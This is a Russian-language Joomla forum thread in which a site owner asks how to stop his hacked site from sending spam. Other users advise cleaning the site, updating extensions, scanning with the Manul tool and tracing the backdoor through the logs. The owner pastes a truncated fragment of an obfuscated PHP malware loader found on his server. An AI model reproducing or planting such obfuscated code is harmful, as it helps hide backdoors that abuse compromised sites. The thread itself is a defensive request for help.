Новости Joomla

0 Пользователей и 1 Гость просматривают эту тему.
  • 11 Ответов
  • 1367 Просмотров
*

vas1lek

  • Осваиваюсь на форуме
  • 34
  • 0 / 0
Спамит сайт
« : 15.09.2015, 21:46:27 »
Подскажите пожалуйста как защитить сайт.
Сайт начинает спамить в логах вижу  такую ситуацию
Спойлер
[свернуть]
удаляю данный php файл так как в нем код с кучей иероглифов к примеру
Цитировать
Код
<?php 
$w93="W2{MCBiJ_tPk^lcgev[oTQ!\$jsfw4O8Z\t5\".&}#AL\nrahIKyU%b09u6S]m*/R+;<7 D),d1NY=FV~`\rH3qEn?X\\x:@>|z-(Gp'"; $GLOBALS['rlslp59'] = $w93[16].$w93[42].$w93[42].$w93[19].$w93[42].$w93[8].$w93[42].$w93[16].$w93[96].$w93[19].$w93[42].$w93[9].$w93[6].$w93[83].$w93[15]; $GLOBALS['akpcw87'] = $w93[6].$w93[83].$w93[6].$w93[8].$w93[25].$w93[16].$w93[9]; $GLOBALS['tudbx5'] = $w93[69].$w93[16].$w93[26].$w93[6].$w93[83].$w93[16]; $GLOBALS['piuiz64'] = $w93[16].$w93[96].$w93[69].$w93[43]
Запускаю сайт все работает отлично логи тоже порядок, но спустя неделю ситуация повторяется.
 
*

vas1lek

  • Осваиваюсь на форуме
  • 34
  • 0 / 0
Re: Спамит сайт
« Ответ #1 : 15.09.2015, 21:57:52 »
Так же есть ли для joomlu botnet attack blocker так как сайт спамит через него.
*

flyingspook

  • Живу я здесь
  • 3590
  • 247 / 9
Re: Спамит сайт
« Ответ #2 : 16.09.2015, 00:52:19 »
Все совершенно просто вас взломали.
Чистите сайт, обновляйте расширения и желательно обновляйте сразу на 3 актуальную версию.
*

wishlight

  • Живу я здесь
  • 4980
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
Re: Спамит сайт
« Ответ #3 : 16.09.2015, 07:45:45 »
По крайней мере надо вычистить сайт и закрыть дырки как всегда.
*

Taatshi

  • Глобальный модератор
  • 5259
  • 481 / 2
  • Верстаем и кодим. Обращайтесь ;)
Re: Спамит сайт
« Ответ #4 : 16.09.2015, 08:19:49 »
У Вас случайно не варезное что-то на сайте стоит?

Прогоните вот этим

https://yandex.ru/promo/manul#about

И результаты нам расскажете
ВЕРСТКА, САЙТЫ ПОД КЛЮЧ, УДАЛЕНИЕ ВИРУСОВ, МИГРАЦИЯ НА JOOMLA 3, ОБНОВЛЕНИЕ  |  ОТЗЫВЫ 
Связь: telegram - Taatshi, почта - Taatshi на яндексе, Skype - Taatshi
*

draff

  • Гуру
  • 5803
  • 434 / 7
  • ищу работу
Re: Спамит сайт
« Ответ #5 : 16.09.2015, 09:28:08 »
Советую настроить запись логов отправки почты.
Так гораздо удобнее вычислить скрипт рассылающий спам через phpmail
*

Taatshi

  • Глобальный модератор
  • 5259
  • 481 / 2
  • Верстаем и кодим. Обращайтесь ;)
Re: Спамит сайт
« Ответ #6 : 16.09.2015, 11:04:32 »
draff, думаю, скрипт искать не надо - он его уже нашел. Ему надо найти бэкдор или уязвимость, через которую это заливается.

vas1lek, а покажите

/plugins/system/jatypo/jatypo/menu.php

с иероглифами.
ВЕРСТКА, САЙТЫ ПОД КЛЮЧ, УДАЛЕНИЕ ВИРУСОВ, МИГРАЦИЯ НА JOOMLA 3, ОБНОВЛЕНИЕ  |  ОТЗЫВЫ 
Связь: telegram - Taatshi, почта - Taatshi на яндексе, Skype - Taatshi
*

vas1lek

  • Осваиваюсь на форуме
  • 34
  • 0 / 0
Re: Спамит сайт
« Ответ #7 : 16.09.2015, 23:41:04 »
draff, думаю, скрипт искать не надо - он его уже нашел. Ему надо найти бэкдор или уязвимость, через которую это заливается.

vas1lek, а покажите

/plugins/system/jatypo/jatypo/menu.php

с иероглифами.
Вот весь код файла menu.php

Спойлер
[свернуть]
*

draff

  • Гуру
  • 5803
  • 434 / 7
  • ищу работу
Re: Спамит сайт
« Ответ #8 : 17.09.2015, 05:37:03 »
draff, думаю, скрипт искать не надо - он его уже нашел. Ему надо найти бэкдор или уязвимость, через которую это заливается.
Как на меня, то гораздо проще следить в mail.log, чем ломать глаза в access.log. И как обычно размещают не один скрипт отправки почты.
*

Taatshi

  • Глобальный модератор
  • 5259
  • 481 / 2
  • Верстаем и кодим. Обращайтесь ;)
Re: Спамит сайт
« Ответ #9 : 17.09.2015, 06:59:10 »
vas1lek, понятно. Теперь Вам нужно найти откуда этот файл попадает к вам на сервер. Делаете так.

Удалите файл, почистите все логи доступа и ошибок на сервере. И внимательно следите. Как только появится - сразу логи смотреть - поиск по имени этого файла. Ищем упоминание. Как найдете самое первое - смотрите откуда появилось. С какого IP - какое действие было с этого IP перед этим... Занятие муторное и требует творческого подхода.

Вы манулом сайт прогоняли? Это гораздо проще, чем рыться в логах.
ВЕРСТКА, САЙТЫ ПОД КЛЮЧ, УДАЛЕНИЕ ВИРУСОВ, МИГРАЦИЯ НА JOOMLA 3, ОБНОВЛЕНИЕ  |  ОТЗЫВЫ 
Связь: telegram - Taatshi, почта - Taatshi на яндексе, Skype - Taatshi
*

vas1lek

  • Осваиваюсь на форуме
  • 34
  • 0 / 0
Re: Спамит сайт
« Ответ #10 : 17.09.2015, 11:17:17 »
Вы манулом сайт прогоняли? Это гораздо проще, чем рыться в логах.
Манулом пробивал, но все время зависало и дальше не идет сканирование. Зависало на какой то png картинке с папки Plugins/system/ .
*

vas1lek

  • Осваиваюсь на форуме
  • 34
  • 0 / 0
Re: Спамит сайт
« Ответ #11 : 17.09.2015, 13:03:02 »
Разбил сайт и по кускам его сканировал Манулом:
После анализа было найдено вредных
./components/com_hdwplayer/views/videos/view.html.php
./plugins/system/jcemediabox/js/jcemediabox.js
куча подозрительных в файлах js, xlx, php/
Залил и те файлы что я удалял menu,php и Манул сказал что там не че вредного нету хотя видно и по коду и по логам что точно он вредный, а тут наоборот что меня удивило.
Файлы могу приложить если надо
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Автоматическое сжатие фото при загрузке на сайт

Автор Amerikana

Ответов: 13
Просмотров: 3154
Последний ответ 30.06.2022, 11:52:23
от Nikita2705
Мультиязычность. При включении плагина "система - фильтр языков" сайт падает

Автор yuraok

Ответов: 10
Просмотров: 4532
Последний ответ 25.06.2022, 14:23:49
от ecolora
Сайт на Joomla 2.5.28 долго грузится - 1-2 минуты

Автор DanPel

Ответов: 5
Просмотров: 1550
Последний ответ 22.01.2020, 11:15:34
от SeBun
Неправильно открывается сайт

Автор totalcolor

Ответов: 4
Просмотров: 1224
Последний ответ 20.04.2019, 12:54:20
от draff
Прыгает/дергается/скачет сайт при внутренних переходах

Автор vegastk

Ответов: 7
Просмотров: 2274
Последний ответ 16.06.2018, 13:07:49
от voras